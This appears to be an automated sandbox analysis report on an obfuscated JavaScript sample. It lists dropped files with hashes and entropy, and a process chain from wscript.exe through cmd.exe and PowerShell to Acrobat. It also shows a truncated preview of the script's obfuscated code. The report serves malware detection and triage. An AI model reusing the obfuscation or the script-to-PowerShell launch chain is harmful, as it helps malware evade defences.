SHA1: | DC67F1519B00784F93570B06D59A97F56CCD0C77 |
SHA-256: | 77CF2529F1C66EC45600E93A8B1796302D1626566A0C86489A8499F7667D8A88 |
SHA-512: | 65A7ED80F1E4A65665178A3B4F7A8465A0E795DFBB9D1629128B1ADB09050A6200C107A15C1BEAA2FCA14B0DE4C88A3360FA40057B2C58A4ED55C95E3DD9EE85 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.290350012540233 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfYdPeUkwRe9:YvXKXaKhgsdTeO6AWksGg8Ukee9 |
MD5: | B9954CA9910B7E4CB96C57EB63C92E8E |
SHA1: | 82D0F822969682E9E61656A0F015CEC03CB3759F |
SHA-256: | A16D3EB086A23A597092AFD1A4D9959E205E9071A2F6F84201B796A53E3FF3FC |
SHA-512: | 0DD47318AA079C619EF8B707C8673E06FC85BEDFDF909B267D72705D2FF4DD174B8775A0095D47F50CFA18851EAAA39E296AABABE6C2C46B4F60DEAC60B28E93 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.276230491217689 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJf+dPeUkwRe9:YvXKXaKhgsdTeO6AWksG28Ukee9 |
MD5: | EAC88EBEAD0E56F1F90F1684A22AD28B |
SHA1: | B921ED20749D75B266FB9F73438F4523777AC140 |
SHA-256: | 6B4D9C671117C34A4436A2AA81CF7DECD4CA33FE5288DDEFA67F90CCA81CEDEB |
SHA-512: | 3F1FF37DAD8B530B88637D25FB4DC8DBD41F5F28240CBD4015811D4DAB030FE8A4469891ADBCC19069B2FDB7483B8D9D70761C6E0CD53904E1D793C03691AA9F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.273963433151965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfbPtdPeUkwRe9:YvXKXaKhgsdTeO6AWksGDV8Ukee9 |
MD5: | B16BA4FEDA0C0C274167E770358AC712 |
SHA1: | D591B54B26EECC7F68E656CCE0CC4F2FC84BEB75 |
SHA-256: | 2CBDD8DCCA10FBB931F58030D8CBD42497D5FF70DB15B9C3BFCC39BC9B1E948A |
SHA-512: | 3DC296C6D9213B3D2679112D34A976461DF493BE0E92A83E9BD6F4A1856C905DF93359A9352E1EEAB3EF9866EE62609723369C94B0F592C16926F71FF4C3AEC2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.278481315550951 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJf21rPeUkwRe9:YvXKXaKhgsdTeO6AWksG+16Ukee9 |
MD5: | 850F9E77544C7294E1D1EE90AD12C735 |
SHA1: | EFA7D391865D7D61B6646B38F6E3F5A3F0405F80 |
SHA-256: | 14D1A57BA4945A536A3A2BA4E60550FA99ADC6B38B1FEA79808FAF67FA7CA30A |
SHA-512: | 5BC5CBBDA68108414BE25A4AFF5781E937A609BE1021C63310D56323FF62F07867225AA8CC46F87CA4FA87C60EAEFF702149CE9AC60FE12CA070A6309DCF5000 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.665797003536733 |
Encrypted: | false |
SSDEEP: | 24:Yv6X7OmeO6g5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSX:YvceHgFBgkDMUJUAh8cvMX |
MD5: | 4DEC43F69CFD38CB428C6BCF66CB7616 |
SHA1: | 14565B28084659E8EF9D44F6EC8AA5B73DD87D21 |
SHA-256: | D95DAA62D51F7ACF1F961EB77CF419F36535D002D4508CFDF5CD80E5A9867B25 |
SHA-512: | B6D46F0F49B153B07143846F8F1549645A6E2135AFFA8D52D0E65B107A03B2CF5C265489DD8D5861DA80E381675151280073344438307E7BECB63BAA142F5AA6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2548074985847775 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJfshHHrPeUkwRe9:YvXKXaKhgsdTeO6AWksGUUUkee9 |
MD5: | DE3D97E8B51ED7CBD664A043F8A7F51A |
SHA1: | 11B3C423E122F17C2FEDA2ED1634CC7CD3CF32CE |
SHA-256: | 7D1AE419180A8DB8D1944D6E21A7EA409168351DAC491D648370A9922ABE39F2 |
SHA-512: | F23C85DD3E38CBF53EB259394248829239A0605C77F63F4E09876FB71920280BEBBDE27F3CFB02CB67DF84969768F3E4678C8B37370D0B05359072B818997139 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.275316560076431 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXDGhMhkQW34WsGiIPEeOF0YaAWkDoAvJTqgFCrPeUkwRe9:YvXKXaKhgsdTeO6AWksGTq16Ukee9 |
MD5: | 0C365D35E847272C102EAB4DD277D78D |
SHA1: | 263D548E0CC155FC6E69CEF36F4831D9C969C1BE |
SHA-256: | 7F09DF9F4B5E625D143AE71341015210C3E3E397D1CE8AC6166B178CEEF9CEE8 |
SHA-512: | 14C7D4288DA29C7353D4F09B83671A21E7E75A31CD89FE2C8A22C92BC450C6A03ABFDBAF3FBC383A6B75EF2E24D00C102667A1E04B48004A0DD961F7ADCCF723 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.150794413767131 |
Encrypted: | false |
SSDEEP: | 24:YW1ZBNHlf4BBkwjxj0SIItO9/2v2LSlCB4kuqac6omaywH/9Q5t5g93+uJOG:YW1BlfM/14lyrm4XAHWLS93R |
MD5: | 13C0DAA5D858D0B4FAA934B4F6E43DED |
SHA1: | 9D6B2172677EF4F13D0257D40D38052C1BB1B239 |
SHA-256: | CF3869776BB40502E1778E91C9E4193DD18A6C1111655397C163F9F241358128 |
SHA-512: | 49BB30D872968023A6801C0402F343E5411722413973480B79C511AE4303936C9D4C250DD1A0E5C5BFDF8646D6CE8DF038CCB644F17C7F34772EAF68163EE68C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.453152330374157 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsnll:lNVmsw3SHtbDbPe0K3+fDZd0 |
MD5: | CDAF091A0D4FBBA4488644141BDB1455 |
SHA1: | 70FAA643E9204725C43DF1BA31D87B998FBBE7E4 |
SHA-256: | 15490FC26AD7BC63BCB27D94C90347E4C15B598A84D8EDB840875D5A0E43B309 |
SHA-512: | D3F92A68E85E5569F914778DE39F6C0A7C3E2801BA1D07411AF753E3A1487B287FE2D1D4668F9D5DB0A0C90799EAED69C33893BBAB404150E6E09A2358038EE3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9586839001295329 |
Encrypted: | false |
SSDEEP: | 48:7M3SrvrBd6dHtbGIbPe0K3+fDy2ds++qFl2GL7msR:7+63SHtbDbPe0K3+fDZdKKVmsR |
MD5: | 678D4FC0CCDCCE401FB349548857A198 |
SHA1: | 38A731ECE97186D5FF08CDD9829AF1B3A91E970A |
SHA-256: | 59EA4E8C53094F161EEC2839826C6FA3507A495DA801DAE09EBFDD2BDADCC2BB |
SHA-512: | A233ECBA658E6408374DCAFC604FF9CDE6D6BEC941A21230F8263435768345256CC5A2980745894DD78DA68D8D8BD39E421E339E40573E6259D5042FAFE7E1E9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg2eMHaltfhBIyhb9iFTh0oFVIYyu:6a6TZ44ADE2eMHEtfh9QFGK |
MD5: | 227B5CAAC74014EC327E12BEC0C4CB3F |
SHA1: | EDD029FE0B199B9207AB8B9216F27E9F7B75231B |
SHA-256: | 55F35C15195FB6D25147DC8E88D61612B139C1900A82C5766516024A340D65AF |
SHA-512: | 341A1877F8DEFA591C7E936C04A0AC41B66AD8112EE2DEFDE10D49B93D78B4015F00BA6D04147A60CA6199FBC97E63D5F570BE0A21F75BC95C5AD5BEA2B26F9A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul/nq/llh:NllUyt |
MD5: | AB80AD9A08E5B16132325DF5584B2CBE |
SHA1: | F7411B7A5826EE6B139EBF40A7BEE999320EF923 |
SHA-256: | 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4 |
SHA-512: | 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.529459928009153 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEzNQlcH:Qw946cPbiOxDlbYnuRK+bDJQGH |
MD5: | 17FE3E69EE7D8F77E296F45F88970CF7 |
SHA1: | 8C0CA28184E3B4427AAFB8AAC41B42F56655D1FD |
SHA-256: | FF791440DD0417786558418837B65E000448522DD1EC8AB04586AC2DA728AAEF |
SHA-512: | 7BE92B650FB057DC02C6838E6EB917AAAA50726F8B1B4222F39A48D9E42FB6DF82C6863E1A5DDCF947ABFAEBC1837E61A0F35D6B53185BB1201A6D8BBAB863E3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 17-38-53-734.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.349296316671179 |
Encrypted: | false |
SSDEEP: | 384:oFBwZVMmYArLif7EuXlZ6bwpmN+WUlZXcryHdhdHOsyBgXWTdfE4yDy3WP8qp0k3:7Ji |
MD5: | 71EB71DF3DB16116E4D80651ADEA68BB |
SHA1: | E3366460BCE0428493AA14E3492B2B344A6A644D |
SHA-256: | FB05334FE556045F9557C4C8FD848C796751DEF7F75000766E03861B734DE6B2 |
SHA-512: | D63004A315697E5786406DE715B903263C5F0C85F64982D4B524D87F2BCC7F7A11B4FF67DC0E6548A31331C8F16AD2F8C628AC4849DE9129429B39BD98301058 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.408947383827755 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRbz9JSt+otR:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR0 |
MD5: | FFEAE8CB27EA7A6B0CE803BB3A57F8EF |
SHA1: | 73C7EE25394ED54C14DDABB859B4E97B14BDE5A6 |
SHA-256: | 9B5EFEEFA4CF5F5488DCDA6C62D25DEE372C84561F69CCC450DAD017C2FCF8E0 |
SHA-512: | F8961EF5B3EC1A503F12C45754F04122DD19CE3D68330D1A4BE3954A76FDC761EBAFDA64700736379BC16127DA9C511480096A2D7BA981B9ABC7C9115BDFC750 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/rKdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWL07oYGZQeYIGNPB:Ta3mlind9i4ufFXpAXkrfUs0kWLxYGZQ |
MD5: | 81778DB3CD3E202CD8FEB47572C9DF55 |
SHA1: | A030EAB46FE2ED66D14270A86F44303F0D742019 |
SHA-256: | 2E4A0CE023C75E0A53D82D4D08DC4ACD144039D04CEA94103C26535CB5B56998 |
SHA-512: | 97BFD23BD03D6E911059092ED0C44779588CE29AE31E8FA1510A7FEE2B92B9E07AE2FFD4614D2566D369E48554269DC95DE42E062E533A4AA5EEC4DBAAAD3D1B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/bwYIGNPgj9WL07oDGZPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:DwZGk9WLxDGZv3mlind9i4ufFXpAXkru |
MD5: | 36AF025F7630DDD5B9C7A6DEB2591572 |
SHA1: | BA981CA594B916799670FC1FA6DA3E5122AC8537 |
SHA-256: | BBA83C28E54F36DF0C19673D9BB24F171E702FAA1C8480F7EBA8B12C4ADF7B87 |
SHA-512: | 4E65D50E52D78876D8A76506E03FBEEFC82AD7DEA40DD1A3AA39F3A4119889A20D0FC28CC8E375ED8FA10A68053AC9B1BAEA49FABC2D13D124C6B087D6733B66 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.8945507056368145 |
TrID: | |
File name: | 28137108151929013281.js |
File size: | 22'462 bytes |
MD5: | 159df8c88d22b41d6261fa158a46f946 |
SHA1: | 0ef24dd2c110a35b7b7c1535db495bc8f9c6f062 |
SHA256: | f881307e3814e5fb112511e848bac5ac2585d90c2e267cadd3e68383d06e5f4b |
SHA512: | ea8deaa112bffe5d9d6e5b6abd9331c1e3b8f0ce79e7bc72c4033fab0a4023bf16a27e9f10cfdbda38a2e518882ba0d5481375324764a8ea618f38ad11935e8b |
SSDEEP: | 192:eNPLglEg2MHFdmjCIQDfv/Ac80Wkw1YfnRa+B6mqtm5e/agXRDGcQ+1okfrt3j/s:PCzlcVo+B6mRQXRbQYo8rdjakrO2bLy |
TLSH: | 33A25687498BCFD786E903F50C765F8A1788524481C8705B8962700F996FAB8E9FB7F1 |
File Content Preview: | function eqsafqfv(){jfaros=[1031,3079,5127,4103,2055,3072];var yedfi=this[eyoylqh+ehcaqs+wxtghaad+prhasytue+buhhn+ghfxntfr+xteppil+hnfozjg](this[ncsmxpuye+etxppesu+kirkkl+wxtghaad+jdxbzdmde+eyoylqh+hnfozjg][ycwaylt+wxtghaad+buhhn+ehcaqs+hnfozjg+buhhn+qwks |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 17:38:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7919b0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 17:38:45 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702b10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 17:38:45 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 17:38:45 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 17:38:50 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 17:38:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702b10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 17:38:50 |
Start date: | 10/01/2025 |
